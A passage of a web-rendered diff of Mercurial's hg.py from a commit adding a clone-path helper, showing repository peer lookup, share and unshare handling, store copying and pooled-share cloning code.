##// END OF EJS Templates
urlutil: add a `get_clone_path` function...
marmoute -
r47696:ebb13f9a default
parent child Browse files
Show More
@@ -1,1580 +1,1580 b''
1 # hg.py - repository classes for mercurial
1 # hg.py - repository classes for mercurial
2 #
2 #
3 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
3 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
4 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 #
5 #
6 # This software may be used and distributed according to the terms of the
6 # This software may be used and distributed according to the terms of the
7 # GNU General Public License version 2 or any later version.
7 # GNU General Public License version 2 or any later version.
8
8
9 from __future__ import absolute_import
9 from __future__ import absolute_import
10
10
11 import errno
11 import errno
12 import os
12 import os
13 import shutil
13 import shutil
14 import stat
14 import stat
15
15
16 from .i18n import _
16 from .i18n import _
17 from .node import (
17 from .node import (
18 hex,
18 hex,
19 nullhex,
19 nullhex,
20 nullid,
20 nullid,
21 short,
21 short,
22 )
22 )
23 from .pycompat import getattr
23 from .pycompat import getattr
24
24
25 from . import (
25 from . import (
26 bookmarks,
26 bookmarks,
27 bundlerepo,
27 bundlerepo,
28 cacheutil,
28 cacheutil,
29 cmdutil,
29 cmdutil,
30 destutil,
30 destutil,
31 discovery,
31 discovery,
32 error,
32 error,
33 exchange,
33 exchange,
34 extensions,
34 extensions,
35 graphmod,
35 graphmod,
36 httppeer,
36 httppeer,
37 localrepo,
37 localrepo,
38 lock,
38 lock,
39 logcmdutil,
39 logcmdutil,
40 logexchange,
40 logexchange,
41 merge as mergemod,
41 merge as mergemod,
42 mergestate as mergestatemod,
42 mergestate as mergestatemod,
43 narrowspec,
43 narrowspec,
44 phases,
44 phases,
45 requirements,
45 requirements,
46 scmutil,
46 scmutil,
47 sshpeer,
47 sshpeer,
48 statichttprepo,
48 statichttprepo,
49 ui as uimod,
49 ui as uimod,
50 unionrepo,
50 unionrepo,
51 url,
51 url,
52 util,
52 util,
53 verify as verifymod,
53 verify as verifymod,
54 vfs as vfsmod,
54 vfs as vfsmod,
55 )
55 )
56 from .utils import (
56 from .utils import (
57 hashutil,
57 hashutil,
58 stringutil,
58 stringutil,
59 urlutil,
59 urlutil,
60 )
60 )
61
61
62
62
63 release = lock.release
63 release = lock.release
64
64
65 # shared features
65 # shared features
66 sharedbookmarks = b'bookmarks'
66 sharedbookmarks = b'bookmarks'
67
67
68
68
69 def _local(path):
69 def _local(path):
70 path = util.expandpath(urlutil.urllocalpath(path))
70 path = util.expandpath(urlutil.urllocalpath(path))
71
71
72 try:
72 try:
73 # we use os.stat() directly here instead of os.path.isfile()
73 # we use os.stat() directly here instead of os.path.isfile()
74 # because the latter started returning `False` on invalid path
74 # because the latter started returning `False` on invalid path
75 # exceptions starting in 3.8 and we care about handling
75 # exceptions starting in 3.8 and we care about handling
76 # invalid paths specially here.
76 # invalid paths specially here.
77 st = os.stat(path)
77 st = os.stat(path)
78 isfile = stat.S_ISREG(st.st_mode)
78 isfile = stat.S_ISREG(st.st_mode)
79 # Python 2 raises TypeError, Python 3 ValueError.
79 # Python 2 raises TypeError, Python 3 ValueError.
80 except (TypeError, ValueError) as e:
80 except (TypeError, ValueError) as e:
81 raise error.Abort(
81 raise error.Abort(
82 _(b'invalid path %s: %s') % (path, stringutil.forcebytestr(e))
82 _(b'invalid path %s: %s') % (path, stringutil.forcebytestr(e))
83 )
83 )
84 except OSError:
84 except OSError:
85 isfile = False
85 isfile = False
86
86
87 return isfile and bundlerepo or localrepo
87 return isfile and bundlerepo or localrepo
88
88
89
89
90 def addbranchrevs(lrepo, other, branches, revs):
90 def addbranchrevs(lrepo, other, branches, revs):
91 peer = other.peer() # a courtesy to callers using a localrepo for other
91 peer = other.peer() # a courtesy to callers using a localrepo for other
92 hashbranch, branches = branches
92 hashbranch, branches = branches
93 if not hashbranch and not branches:
93 if not hashbranch and not branches:
94 x = revs or None
94 x = revs or None
95 if revs:
95 if revs:
96 y = revs[0]
96 y = revs[0]
97 else:
97 else:
98 y = None
98 y = None
99 return x, y
99 return x, y
100 if revs:
100 if revs:
101 revs = list(revs)
101 revs = list(revs)
102 else:
102 else:
103 revs = []
103 revs = []
104
104
105 if not peer.capable(b'branchmap'):
105 if not peer.capable(b'branchmap'):
106 if branches:
106 if branches:
107 raise error.Abort(_(b"remote branch lookup not supported"))
107 raise error.Abort(_(b"remote branch lookup not supported"))
108 revs.append(hashbranch)
108 revs.append(hashbranch)
109 return revs, revs[0]
109 return revs, revs[0]
110
110
111 with peer.commandexecutor() as e:
111 with peer.commandexecutor() as e:
112 branchmap = e.callcommand(b'branchmap', {}).result()
112 branchmap = e.callcommand(b'branchmap', {}).result()
113
113
114 def primary(branch):
114 def primary(branch):
115 if branch == b'.':
115 if branch == b'.':
116 if not lrepo:
116 if not lrepo:
117 raise error.Abort(_(b"dirstate branch not accessible"))
117 raise error.Abort(_(b"dirstate branch not accessible"))
118 branch = lrepo.dirstate.branch()
118 branch = lrepo.dirstate.branch()
119 if branch in branchmap:
119 if branch in branchmap:
120 revs.extend(hex(r) for r in reversed(branchmap[branch]))
120 revs.extend(hex(r) for r in reversed(branchmap[branch]))
121 return True
121 return True
122 else:
122 else:
123 return False
123 return False
124
124
125 for branch in branches:
125 for branch in branches:
126 if not primary(branch):
126 if not primary(branch):
127 raise error.RepoLookupError(_(b"unknown branch '%s'") % branch)
127 raise error.RepoLookupError(_(b"unknown branch '%s'") % branch)
128 if hashbranch:
128 if hashbranch:
129 if not primary(hashbranch):
129 if not primary(hashbranch):
130 revs.append(hashbranch)
130 revs.append(hashbranch)
131 return revs, revs[0]
131 return revs, revs[0]
132
132
133
133
134 def parseurl(path, branches=None):
134 def parseurl(path, branches=None):
135 '''parse url#branch, returning (url, (branch, branches))'''
135 '''parse url#branch, returning (url, (branch, branches))'''
136 msg = b'parseurl(...) moved to mercurial.utils.urlutil'
136 msg = b'parseurl(...) moved to mercurial.utils.urlutil'
137 util.nouideprecwarn(msg, b'6.0', stacklevel=2)
137 util.nouideprecwarn(msg, b'6.0', stacklevel=2)
138 return urlutil.parseurl(path, branches=branches)
138 return urlutil.parseurl(path, branches=branches)
139
139
140
140
141 schemes = {
141 schemes = {
142 b'bundle': bundlerepo,
142 b'bundle': bundlerepo,
143 b'union': unionrepo,
143 b'union': unionrepo,
144 b'file': _local,
144 b'file': _local,
145 b'http': httppeer,
145 b'http': httppeer,
146 b'https': httppeer,
146 b'https': httppeer,
147 b'ssh': sshpeer,
147 b'ssh': sshpeer,
148 b'static-http': statichttprepo,
148 b'static-http': statichttprepo,
149 }
149 }
150
150
151
151
152 def _peerlookup(path):
152 def _peerlookup(path):
153 u = urlutil.url(path)
153 u = urlutil.url(path)
154 scheme = u.scheme or b'file'
154 scheme = u.scheme or b'file'
155 thing = schemes.get(scheme) or schemes[b'file']
155 thing = schemes.get(scheme) or schemes[b'file']
156 try:
156 try:
157 return thing(path)
157 return thing(path)
158 except TypeError:
158 except TypeError:
159 # we can't test callable(thing) because 'thing' can be an unloaded
159 # we can't test callable(thing) because 'thing' can be an unloaded
160 # module that implements __call__
160 # module that implements __call__
161 if not util.safehasattr(thing, b'instance'):
161 if not util.safehasattr(thing, b'instance'):
162 raise
162 raise
163 return thing
163 return thing
164
164
165
165
166 def islocal(repo):
166 def islocal(repo):
167 '''return true if repo (or path pointing to repo) is local'''
167 '''return true if repo (or path pointing to repo) is local'''
168 if isinstance(repo, bytes):
168 if isinstance(repo, bytes):
169 try:
169 try:
170 return _peerlookup(repo).islocal(repo)
170 return _peerlookup(repo).islocal(repo)
171 except AttributeError:
171 except AttributeError:
172 return False
172 return False
173 return repo.local()
173 return repo.local()
174
174
175
175
176 def openpath(ui, path, sendaccept=True):
176 def openpath(ui, path, sendaccept=True):
177 '''open path with open if local, url.open if remote'''
177 '''open path with open if local, url.open if remote'''
178 pathurl = urlutil.url(path, parsequery=False, parsefragment=False)
178 pathurl = urlutil.url(path, parsequery=False, parsefragment=False)
179 if pathurl.islocal():
179 if pathurl.islocal():
180 return util.posixfile(pathurl.localpath(), b'rb')
180 return util.posixfile(pathurl.localpath(), b'rb')
181 else:
181 else:
182 return url.open(ui, path, sendaccept=sendaccept)
182 return url.open(ui, path, sendaccept=sendaccept)
183
183
184
184
185 # a list of (ui, repo) functions called for wire peer initialization
185 # a list of (ui, repo) functions called for wire peer initialization
186 wirepeersetupfuncs = []
186 wirepeersetupfuncs = []
187
187
188
188
189 def _peerorrepo(
189 def _peerorrepo(
190 ui, path, create=False, presetupfuncs=None, intents=None, createopts=None
190 ui, path, create=False, presetupfuncs=None, intents=None, createopts=None
191 ):
191 ):
192 """return a repository object for the specified path"""
192 """return a repository object for the specified path"""
193 obj = _peerlookup(path).instance(
193 obj = _peerlookup(path).instance(
194 ui, path, create, intents=intents, createopts=createopts
194 ui, path, create, intents=intents, createopts=createopts
195 )
195 )
196 ui = getattr(obj, "ui", ui)
196 ui = getattr(obj, "ui", ui)
197 for f in presetupfuncs or []:
197 for f in presetupfuncs or []:
198 f(ui, obj)
198 f(ui, obj)
199 ui.log(b'extension', b'- executing reposetup hooks\n')
199 ui.log(b'extension', b'- executing reposetup hooks\n')
200 with util.timedcm('all reposetup') as allreposetupstats:
200 with util.timedcm('all reposetup') as allreposetupstats:
201 for name, module in extensions.extensions(ui):
201 for name, module in extensions.extensions(ui):
202 ui.log(b'extension', b' - running reposetup for %s\n', name)
202 ui.log(b'extension', b' - running reposetup for %s\n', name)
203 hook = getattr(module, 'reposetup', None)
203 hook = getattr(module, 'reposetup', None)
204 if hook:
204 if hook:
205 with util.timedcm('reposetup %r', name) as stats:
205 with util.timedcm('reposetup %r', name) as stats:
206 hook(ui, obj)
206 hook(ui, obj)
207 ui.log(
207 ui.log(
208 b'extension', b' > reposetup for %s took %s\n', name, stats
208 b'extension', b' > reposetup for %s took %s\n', name, stats
209 )
209 )
210 ui.log(b'extension', b'> all reposetup took %s\n', allreposetupstats)
210 ui.log(b'extension', b'> all reposetup took %s\n', allreposetupstats)
211 if not obj.local():
211 if not obj.local():
212 for f in wirepeersetupfuncs:
212 for f in wirepeersetupfuncs:
213 f(ui, obj)
213 f(ui, obj)
214 return obj
214 return obj
215
215
216
216
217 def repository(
217 def repository(
218 ui,
218 ui,
219 path=b'',
219 path=b'',
220 create=False,
220 create=False,
221 presetupfuncs=None,
221 presetupfuncs=None,
222 intents=None,
222 intents=None,
223 createopts=None,
223 createopts=None,
224 ):
224 ):
225 """return a repository object for the specified path"""
225 """return a repository object for the specified path"""
226 peer = _peerorrepo(
226 peer = _peerorrepo(
227 ui,
227 ui,
228 path,
228 path,
229 create,
229 create,
230 presetupfuncs=presetupfuncs,
230 presetupfuncs=presetupfuncs,
231 intents=intents,
231 intents=intents,
232 createopts=createopts,
232 createopts=createopts,
233 )
233 )
234 repo = peer.local()
234 repo = peer.local()
235 if not repo:
235 if not repo:
236 raise error.Abort(
236 raise error.Abort(
237 _(b"repository '%s' is not local") % (path or peer.url())
237 _(b"repository '%s' is not local") % (path or peer.url())
238 )
238 )
239 return repo.filtered(b'visible')
239 return repo.filtered(b'visible')
240
240
241
241
242 def peer(uiorrepo, opts, path, create=False, intents=None, createopts=None):
242 def peer(uiorrepo, opts, path, create=False, intents=None, createopts=None):
243 '''return a repository peer for the specified path'''
243 '''return a repository peer for the specified path'''
244 rui = remoteui(uiorrepo, opts)
244 rui = remoteui(uiorrepo, opts)
245 return _peerorrepo(
245 return _peerorrepo(
246 rui, path, create, intents=intents, createopts=createopts
246 rui, path, create, intents=intents, createopts=createopts
247 ).peer()
247 ).peer()
248
248
249
249
250 def defaultdest(source):
250 def defaultdest(source):
251 """return default destination of clone if none is given
251 """return default destination of clone if none is given
252
252
253 >>> defaultdest(b'foo')
253 >>> defaultdest(b'foo')
254 'foo'
254 'foo'
255 >>> defaultdest(b'/foo/bar')
255 >>> defaultdest(b'/foo/bar')
256 'bar'
256 'bar'
257 >>> defaultdest(b'/')
257 >>> defaultdest(b'/')
258 ''
258 ''
259 >>> defaultdest(b'')
259 >>> defaultdest(b'')
260 ''
260 ''
261 >>> defaultdest(b'http://example.org/')
261 >>> defaultdest(b'http://example.org/')
262 ''
262 ''
263 >>> defaultdest(b'http://example.org/foo/')
263 >>> defaultdest(b'http://example.org/foo/')
264 'foo'
264 'foo'
265 """
265 """
266 path = urlutil.url(source).path
266 path = urlutil.url(source).path
267 if not path:
267 if not path:
268 return b''
268 return b''
269 return os.path.basename(os.path.normpath(path))
269 return os.path.basename(os.path.normpath(path))
270
270
271
271
272 def sharedreposource(repo):
272 def sharedreposource(repo):
273 """Returns repository object for source repository of a shared repo.
273 """Returns repository object for source repository of a shared repo.
274
274
275 If repo is not a shared repository, returns None.
275 If repo is not a shared repository, returns None.
276 """
276 """
277 if repo.sharedpath == repo.path:
277 if repo.sharedpath == repo.path:
278 return None
278 return None
279
279
280 if util.safehasattr(repo, b'srcrepo') and repo.srcrepo:
280 if util.safehasattr(repo, b'srcrepo') and repo.srcrepo:
281 return repo.srcrepo
281 return repo.srcrepo
282
282
283 # the sharedpath always ends in the .hg; we want the path to the repo
283 # the sharedpath always ends in the .hg; we want the path to the repo
284 source = repo.vfs.split(repo.sharedpath)[0]
284 source = repo.vfs.split(repo.sharedpath)[0]
285 srcurl, branches = urlutil.parseurl(source)
285 srcurl, branches = urlutil.parseurl(source)
286 srcrepo = repository(repo.ui, srcurl)
286 srcrepo = repository(repo.ui, srcurl)
287 repo.srcrepo = srcrepo
287 repo.srcrepo = srcrepo
288 return srcrepo
288 return srcrepo
289
289
290
290
291 def share(
291 def share(
292 ui,
292 ui,
293 source,
293 source,
294 dest=None,
294 dest=None,
295 update=True,
295 update=True,
296 bookmarks=True,
296 bookmarks=True,
297 defaultpath=None,
297 defaultpath=None,
298 relative=False,
298 relative=False,
299 ):
299 ):
300 '''create a shared repository'''
300 '''create a shared repository'''
301
301
302 if not islocal(source):
302 if not islocal(source):
303 raise error.Abort(_(b'can only share local repositories'))
303 raise error.Abort(_(b'can only share local repositories'))
304
304
305 if not dest:
305 if not dest:
306 dest = defaultdest(source)
306 dest = defaultdest(source)
307 else:
307 else:
308 dest = ui.expandpath(dest)
308 dest = ui.expandpath(dest)
309
309
310 if isinstance(source, bytes):
310 if isinstance(source, bytes):
311 origsource = ui.expandpath(source)
311 origsource = ui.expandpath(source)
312 source, branches = urlutil.parseurl(origsource)
312 source, branches = urlutil.parseurl(origsource)
313 srcrepo = repository(ui, source)
313 srcrepo = repository(ui, source)
314 rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None)
314 rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None)
315 else:
315 else:
316 srcrepo = source.local()
316 srcrepo = source.local()
317 checkout = None
317 checkout = None
318
318
319 shareditems = set()
319 shareditems = set()
320 if bookmarks:
320 if bookmarks:
321 shareditems.add(sharedbookmarks)
321 shareditems.add(sharedbookmarks)
322
322
323 r = repository(
323 r = repository(
324 ui,
324 ui,
325 dest,
325 dest,
326 create=True,
326 create=True,
327 createopts={
327 createopts={
328 b'sharedrepo': srcrepo,
328 b'sharedrepo': srcrepo,
329 b'sharedrelative': relative,
329 b'sharedrelative': relative,
330 b'shareditems': shareditems,
330 b'shareditems': shareditems,
331 },
331 },
332 )
332 )
333
333
334 postshare(srcrepo, r, defaultpath=defaultpath)
334 postshare(srcrepo, r, defaultpath=defaultpath)
335 r = repository(ui, dest)
335 r = repository(ui, dest)
336 _postshareupdate(r, update, checkout=checkout)
336 _postshareupdate(r, update, checkout=checkout)
337 return r
337 return r
338
338
339
339
340 def _prependsourcehgrc(repo):
340 def _prependsourcehgrc(repo):
341 """copies the source repo config and prepend it in current repo .hg/hgrc
341 """copies the source repo config and prepend it in current repo .hg/hgrc
342 on unshare. This is only done if the share was perfomed using share safe
342 on unshare. This is only done if the share was perfomed using share safe
343 method where we share config of source in shares"""
343 method where we share config of source in shares"""
344 srcvfs = vfsmod.vfs(repo.sharedpath)
344 srcvfs = vfsmod.vfs(repo.sharedpath)
345 dstvfs = vfsmod.vfs(repo.path)
345 dstvfs = vfsmod.vfs(repo.path)
346
346
347 if not srcvfs.exists(b'hgrc'):
347 if not srcvfs.exists(b'hgrc'):
348 return
348 return
349
349
350 currentconfig = b''
350 currentconfig = b''
351 if dstvfs.exists(b'hgrc'):
351 if dstvfs.exists(b'hgrc'):
352 currentconfig = dstvfs.read(b'hgrc')
352 currentconfig = dstvfs.read(b'hgrc')
353
353
354 with dstvfs(b'hgrc', b'wb') as fp:
354 with dstvfs(b'hgrc', b'wb') as fp:
355 sourceconfig = srcvfs.read(b'hgrc')
355 sourceconfig = srcvfs.read(b'hgrc')
356 fp.write(b"# Config copied from shared source\n")
356 fp.write(b"# Config copied from shared source\n")
357 fp.write(sourceconfig)
357 fp.write(sourceconfig)
358 fp.write(b'\n')
358 fp.write(b'\n')
359 fp.write(currentconfig)
359 fp.write(currentconfig)
360
360
361
361
362 def unshare(ui, repo):
362 def unshare(ui, repo):
363 """convert a shared repository to a normal one
363 """convert a shared repository to a normal one
364
364
365 Copy the store data to the repo and remove the sharedpath data.
365 Copy the store data to the repo and remove the sharedpath data.
366
366
367 Returns a new repository object representing the unshared repository.
367 Returns a new repository object representing the unshared repository.
368
368
369 The passed repository object is not usable after this function is
369 The passed repository object is not usable after this function is
370 called.
370 called.
371 """
371 """
372
372
373 with repo.lock():
373 with repo.lock():
374 # we use locks here because if we race with commit, we
374 # we use locks here because if we race with commit, we
375 # can end up with extra data in the cloned revlogs that's
375 # can end up with extra data in the cloned revlogs that's
376 # not pointed to by changesets, thus causing verify to
376 # not pointed to by changesets, thus causing verify to
377 # fail
377 # fail
378 destlock = copystore(ui, repo, repo.path)
378 destlock = copystore(ui, repo, repo.path)
379 with destlock or util.nullcontextmanager():
379 with destlock or util.nullcontextmanager():
380 if requirements.SHARESAFE_REQUIREMENT in repo.requirements:
380 if requirements.SHARESAFE_REQUIREMENT in repo.requirements:
381 # we were sharing .hg/hgrc of the share source with the current
381 # we were sharing .hg/hgrc of the share source with the current
382 # repo. We need to copy that while unsharing otherwise it can
382 # repo. We need to copy that while unsharing otherwise it can
383 # disable hooks and other checks
383 # disable hooks and other checks
384 _prependsourcehgrc(repo)
384 _prependsourcehgrc(repo)
385
385
386 sharefile = repo.vfs.join(b'sharedpath')
386 sharefile = repo.vfs.join(b'sharedpath')
387 util.rename(sharefile, sharefile + b'.old')
387 util.rename(sharefile, sharefile + b'.old')
388
388
389 repo.requirements.discard(requirements.SHARED_REQUIREMENT)
389 repo.requirements.discard(requirements.SHARED_REQUIREMENT)
390 repo.requirements.discard(requirements.RELATIVE_SHARED_REQUIREMENT)
390 repo.requirements.discard(requirements.RELATIVE_SHARED_REQUIREMENT)
391 scmutil.writereporequirements(repo)
391 scmutil.writereporequirements(repo)
392
392
393 # Removing share changes some fundamental properties of the repo instance.
393 # Removing share changes some fundamental properties of the repo instance.
394 # So we instantiate a new repo object and operate on it rather than
394 # So we instantiate a new repo object and operate on it rather than
395 # try to keep the existing repo usable.
395 # try to keep the existing repo usable.
396 newrepo = repository(repo.baseui, repo.root, create=False)
396 newrepo = repository(repo.baseui, repo.root, create=False)
397
397
398 # TODO: figure out how to access subrepos that exist, but were previously
398 # TODO: figure out how to access subrepos that exist, but were previously
399 # removed from .hgsub
399 # removed from .hgsub
400 c = newrepo[b'.']
400 c = newrepo[b'.']
401 subs = c.substate
401 subs = c.substate
402 for s in sorted(subs):
402 for s in sorted(subs):
403 c.sub(s).unshare()
403 c.sub(s).unshare()
404
404
405 localrepo.poisonrepository(repo)
405 localrepo.poisonrepository(repo)
406
406
407 return newrepo
407 return newrepo
408
408
409
409
410 def postshare(sourcerepo, destrepo, defaultpath=None):
410 def postshare(sourcerepo, destrepo, defaultpath=None):
411 """Called after a new shared repo is created.
411 """Called after a new shared repo is created.
412
412
413 The new repo only has a requirements file and pointer to the source.
413 The new repo only has a requirements file and pointer to the source.
414 This function configures additional shared data.
414 This function configures additional shared data.
415
415
416 Extensions can wrap this function and write additional entries to
416 Extensions can wrap this function and write additional entries to
417 destrepo/.hg/shared to indicate additional pieces of data to be shared.
417 destrepo/.hg/shared to indicate additional pieces of data to be shared.
418 """
418 """
419 default = defaultpath or sourcerepo.ui.config(b'paths', b'default')
419 default = defaultpath or sourcerepo.ui.config(b'paths', b'default')
420 if default:
420 if default:
421 template = b'[paths]\ndefault = %s\n'
421 template = b'[paths]\ndefault = %s\n'
422 destrepo.vfs.write(b'hgrc', util.tonativeeol(template % default))
422 destrepo.vfs.write(b'hgrc', util.tonativeeol(template % default))
423 if requirements.NARROW_REQUIREMENT in sourcerepo.requirements:
423 if requirements.NARROW_REQUIREMENT in sourcerepo.requirements:
424 with destrepo.wlock():
424 with destrepo.wlock():
425 narrowspec.copytoworkingcopy(destrepo)
425 narrowspec.copytoworkingcopy(destrepo)
426
426
427
427
428 def _postshareupdate(repo, update, checkout=None):
428 def _postshareupdate(repo, update, checkout=None):
429 """Maybe perform a working directory update after a shared repo is created.
429 """Maybe perform a working directory update after a shared repo is created.
430
430
431 ``update`` can be a boolean or a revision to update to.
431 ``update`` can be a boolean or a revision to update to.
432 """
432 """
433 if not update:
433 if not update:
434 return
434 return
435
435
436 repo.ui.status(_(b"updating working directory\n"))
436 repo.ui.status(_(b"updating working directory\n"))
437 if update is not True:
437 if update is not True:
438 checkout = update
438 checkout = update
439 for test in (checkout, b'default', b'tip'):
439 for test in (checkout, b'default', b'tip'):
440 if test is None:
440 if test is None:
441 continue
441 continue
442 try:
442 try:
443 uprev = repo.lookup(test)
443 uprev = repo.lookup(test)
444 break
444 break
445 except error.RepoLookupError:
445 except error.RepoLookupError:
446 continue
446 continue
447 _update(repo, uprev)
447 _update(repo, uprev)
448
448
449
449
450 def copystore(ui, srcrepo, destpath):
450 def copystore(ui, srcrepo, destpath):
451 """copy files from store of srcrepo in destpath
451 """copy files from store of srcrepo in destpath
452
452
453 returns destlock
453 returns destlock
454 """
454 """
455 destlock = None
455 destlock = None
456 try:
456 try:
457 hardlink = None
457 hardlink = None
458 topic = _(b'linking') if hardlink else _(b'copying')
458 topic = _(b'linking') if hardlink else _(b'copying')
459 with ui.makeprogress(topic, unit=_(b'files')) as progress:
459 with ui.makeprogress(topic, unit=_(b'files')) as progress:
460 num = 0
460 num = 0
461 srcpublishing = srcrepo.publishing()
461 srcpublishing = srcrepo.publishing()
462 srcvfs = vfsmod.vfs(srcrepo.sharedpath)
462 srcvfs = vfsmod.vfs(srcrepo.sharedpath)
463 dstvfs = vfsmod.vfs(destpath)
463 dstvfs = vfsmod.vfs(destpath)
464 for f in srcrepo.store.copylist():
464 for f in srcrepo.store.copylist():
465 if srcpublishing and f.endswith(b'phaseroots'):
465 if srcpublishing and f.endswith(b'phaseroots'):
466 continue
466 continue
467 dstbase = os.path.dirname(f)
467 dstbase = os.path.dirname(f)
468 if dstbase and not dstvfs.exists(dstbase):
468 if dstbase and not dstvfs.exists(dstbase):
469 dstvfs.mkdir(dstbase)
469 dstvfs.mkdir(dstbase)
470 if srcvfs.exists(f):
470 if srcvfs.exists(f):
471 if f.endswith(b'data'):
471 if f.endswith(b'data'):
472 # 'dstbase' may be empty (e.g. revlog format 0)
472 # 'dstbase' may be empty (e.g. revlog format 0)
473 lockfile = os.path.join(dstbase, b"lock")
473 lockfile = os.path.join(dstbase, b"lock")
474 # lock to avoid premature writing to the target
474 # lock to avoid premature writing to the target
475 destlock = lock.lock(dstvfs, lockfile)
475 destlock = lock.lock(dstvfs, lockfile)
476 hardlink, n = util.copyfiles(
476 hardlink, n = util.copyfiles(
477 srcvfs.join(f), dstvfs.join(f), hardlink, progress
477 srcvfs.join(f), dstvfs.join(f), hardlink, progress
478 )
478 )
479 num += n
479 num += n
480 if hardlink:
480 if hardlink:
481 ui.debug(b"linked %d files\n" % num)
481 ui.debug(b"linked %d files\n" % num)
482 else:
482 else:
483 ui.debug(b"copied %d files\n" % num)
483 ui.debug(b"copied %d files\n" % num)
484 return destlock
484 return destlock
485 except: # re-raises
485 except: # re-raises
486 release(destlock)
486 release(destlock)
487 raise
487 raise
488
488
489
489
490 def clonewithshare(
490 def clonewithshare(
491 ui,
491 ui,
492 peeropts,
492 peeropts,
493 sharepath,
493 sharepath,
494 source,
494 source,
495 srcpeer,
495 srcpeer,
496 dest,
496 dest,
497 pull=False,
497 pull=False,
498 rev=None,
498 rev=None,
499 update=True,
499 update=True,
500 stream=False,
500 stream=False,
501 ):
501 ):
502 """Perform a clone using a shared repo.
502 """Perform a clone using a shared repo.
503
503
504 The store for the repository will be located at <sharepath>/.hg. The
504 The store for the repository will be located at <sharepath>/.hg. The
505 specified revisions will be cloned or pulled from "source". A shared repo
505 specified revisions will be cloned or pulled from "source". A shared repo
506 will be created at "dest" and a working copy will be created if "update" is
506 will be created at "dest" and a working copy will be created if "update" is
507 True.
507 True.
508 """
508 """
509 revs = None
509 revs = None
510 if rev:
510 if rev:
511 if not srcpeer.capable(b'lookup'):
511 if not srcpeer.capable(b'lookup'):
512 raise error.Abort(
512 raise error.Abort(
513 _(
513 _(
514 b"src repository does not support "
514 b"src repository does not support "
515 b"revision lookup and so doesn't "
515 b"revision lookup and so doesn't "
516 b"support clone by revision"
516 b"support clone by revision"
517 )
517 )
518 )
518 )
519
519
520 # TODO this is batchable.
520 # TODO this is batchable.
521 remoterevs = []
521 remoterevs = []
522 for r in rev:
522 for r in rev:
523 with srcpeer.commandexecutor() as e:
523 with srcpeer.commandexecutor() as e:
524 remoterevs.append(
524 remoterevs.append(
525 e.callcommand(
525 e.callcommand(
526 b'lookup',
526 b'lookup',
527 {
527 {
528 b'key': r,
528 b'key': r,
529 },
529 },
530 ).result()
530 ).result()
531 )
531 )
532 revs = remoterevs
532 revs = remoterevs
533
533
534 # Obtain a lock before checking for or cloning the pooled repo otherwise
534 # Obtain a lock before checking for or cloning the pooled repo otherwise
535 # 2 clients may race creating or populating it.
535 # 2 clients may race creating or populating it.
536 pooldir = os.path.dirname(sharepath)
536 pooldir = os.path.dirname(sharepath)
537 # lock class requires the directory to exist.
537 # lock class requires the directory to exist.
538 try:
538 try:
539 util.makedir(pooldir, False)
539 util.makedir(pooldir, False)
540 except OSError as e:
540 except OSError as e:
541 if e.errno != errno.EEXIST:
541 if e.errno != errno.EEXIST:
542 raise
542 raise
543
543
544 poolvfs = vfsmod.vfs(pooldir)
544 poolvfs = vfsmod.vfs(pooldir)
545 basename = os.path.basename(sharepath)
545 basename = os.path.basename(sharepath)
546
546
547 with lock.lock(poolvfs, b'%s.lock' % basename):
547 with lock.lock(poolvfs, b'%s.lock' % basename):
548 if os.path.exists(sharepath):
548 if os.path.exists(sharepath):
549 ui.status(
549 ui.status(
550 _(b'(sharing from existing pooled repository %s)\n') % basename
550 _(b'(sharing from existing pooled repository %s)\n') % basename
551 )
551 )
552 else:
552 else:
553 ui.status(
553 ui.status(
554 _(b'(sharing from new pooled repository %s)\n') % basename
554 _(b'(sharing from new pooled repository %s)\n') % basename
555 )
555 )
556 # Always use pull mode because hardlinks in share mode don't work
556 # Always use pull mode because hardlinks in share mode don't work
557 # well. Never update because working copies aren't necessary in
557 # well. Never update because working copies aren't necessary in
558 # share mode.
558 # share mode.
559 clone(
559 clone(
560 ui,
560 ui,
561 peeropts,
561 peeropts,
562 source,
562 source,
563 dest=sharepath,
563 dest=sharepath,
564 pull=True,
564 pull=True,
565 revs=rev,
565 revs=rev,
566 update=False,
566 update=False,
567 stream=stream,
567 stream=stream,
568 )
568 )
569
569
570 # Resolve the value to put in [paths] section for the source.
570 # Resolve the value to put in [paths] section for the source.
571 if islocal(source):
571 if islocal(source):
572 defaultpath = os.path.abspath(urlutil.urllocalpath(source))
572 defaultpath = os.path.abspath(urlutil.urllocalpath(source))
573 else:
573 else:
574 defaultpath = source
574 defaultpath = source
575
575
576 sharerepo = repository(ui, path=sharepath)
576 sharerepo = repository(ui, path=sharepath)
577 destrepo = share(
577 destrepo = share(
578 ui,
578 ui,
579 sharerepo,
579 sharerepo,
580 dest=dest,
580 dest=dest,
581 update=False,
581 update=False,
582 bookmarks=False,
582 bookmarks=False,
583 defaultpath=defaultpath,
583 defaultpath=defaultpath,
584 )
584 )
585
585
586 # We need to perform a pull against the dest repo to fetch bookmarks
586 # We need to perform a pull against the dest repo to fetch bookmarks
587 # and other non-store data that isn't shared by default. In the case of
587 # and other non-store data that isn't shared by default. In the case of
588 # non-existing shared repo, this means we pull from the remote twice. This
588 # non-existing shared repo, this means we pull from the remote twice. This
589 # is a bit weird. But at the time it was implemented, there wasn't an easy
589 # is a bit weird. But at the time it was implemented, there wasn't an easy
590 # way to pull just non-changegroup data.
590 # way to pull just non-changegroup data.
591 exchange.pull(destrepo, srcpeer, heads=revs)
591 exchange.pull(destrepo, srcpeer, heads=revs)
592
592
593 _postshareupdate(destrepo, update)
593 _postshareupdate(destrepo, update)
594
594
595 return srcpeer, peer(ui, peeropts, dest)
595 return srcpeer, peer(ui, peeropts, dest)
596
596
597
597
598 # Recomputing caches is often slow on big repos, so copy them.
598 # Recomputing caches is often slow on big repos, so copy them.
599 def _copycache(srcrepo, dstcachedir, fname):
599 def _copycache(srcrepo, dstcachedir, fname):
600 """copy a cache from srcrepo to destcachedir (if it exists)"""
600 """copy a cache from srcrepo to destcachedir (if it exists)"""
601 srcfname = srcrepo.cachevfs.join(fname)
601 srcfname = srcrepo.cachevfs.join(fname)
602 dstfname = os.path.join(dstcachedir, fname)
602 dstfname = os.path.join(dstcachedir, fname)
603 if os.path.exists(srcfname):
603 if os.path.exists(srcfname):
604 if not os.path.exists(dstcachedir):
